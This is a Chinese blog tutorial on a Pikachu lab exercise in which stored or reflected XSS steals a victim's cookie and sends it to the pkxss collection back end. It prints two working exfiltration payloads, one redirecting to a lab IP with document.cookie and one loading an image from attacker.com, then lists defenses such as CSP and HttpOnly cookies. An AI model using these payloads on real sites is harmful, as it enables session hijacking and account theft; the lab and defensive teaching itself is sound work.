Pikichu-xss实验案例-通过xss获取cookie

利用pikachu后台进行XSS攻击获取cookie

原理图:

pikachu提供了一个pkxss后台;

该后台可以把获得的cookie信息显示出来;

查看后端代码cookie.php:就是获取cookie信息,保存起来,然后重定向跳转到目标页面;修改最后从定向的ip,改为自己测试用的IP地址;

对此,构造攻击payload, 获取到cookie ,然后从定向跳转到pkxss后台,pkxss后台把数据保存后,重新重定向回到被攻击的页面。

<script>document.location='http://192.168.3.224:8082/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>
//192.168.3.224  代表pkxss 的后台   document.cookie表示获取被攻击平台的cookie
//拿到cookie后,重定向到pkxss后台把数据保存起来

得到攻击信息。

### 利用XSS攻击窃取Cookie的方法 在存在跨站脚本(XSS)漏洞的情况下,攻击者可以通过注入恶意JavaScript代码来读取并传输受害者的HTTP Cookie给攻击者控制的服务器。具体过程如下: 一旦成功执行了带有恶意载荷的脚本,该脚本可以访问文档对象模型(DOM),进而获取存储于浏览器中的敏感数据,例如`document.cookie`属性所保存的信息[^1]。 ```javascript <script> var img = new Image(); img.src="http://attacker.com/steal?cookies="+encodeURIComponent(document.cookie); </script> ``` 此段代码创建了一个新的图像元素,并将其源设置为攻击者的URL加上当前页面所有的Cookies作为查询参数的一部分。由于大多数情况下图片加载不会被用户察觉,因此这种手法具有很强隐蔽性。 然而值得注意的是,在现代浏览器中,默认情况下同源政策会阻止不同域之间的资源交互;而且HttpOnly标志位能够防止JavaScript直接读取特定类型的cookie,从而大大降低了上述方法成功的可能性[^2]。 ### 防御措施 为了有效地抵御此类攻击,开发者应该采取一系列预防性的编码实践和技术手段: - **输入验证与清理**:确保所有来自客户端的数据都经过严格的校验和转义处理后再用于构建HTML响应内容。 - **采用Content Security Policy (CSP)**:这是一种额外的安全层,它允许站点管理员声明哪些外部资源可以在其网页上运行,有助于减少潜在风险。 - **设置HttpOnly Cookies**:对于那些不需要由JavaScript存取的重要凭证信息(如Session ID),应当标记为HttpOnly以避免它们成为JS可触及的目标。 - **定期审查依赖项**:保持使用的第三方库处于最新版本状态,及时修补已知的安全缺陷。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值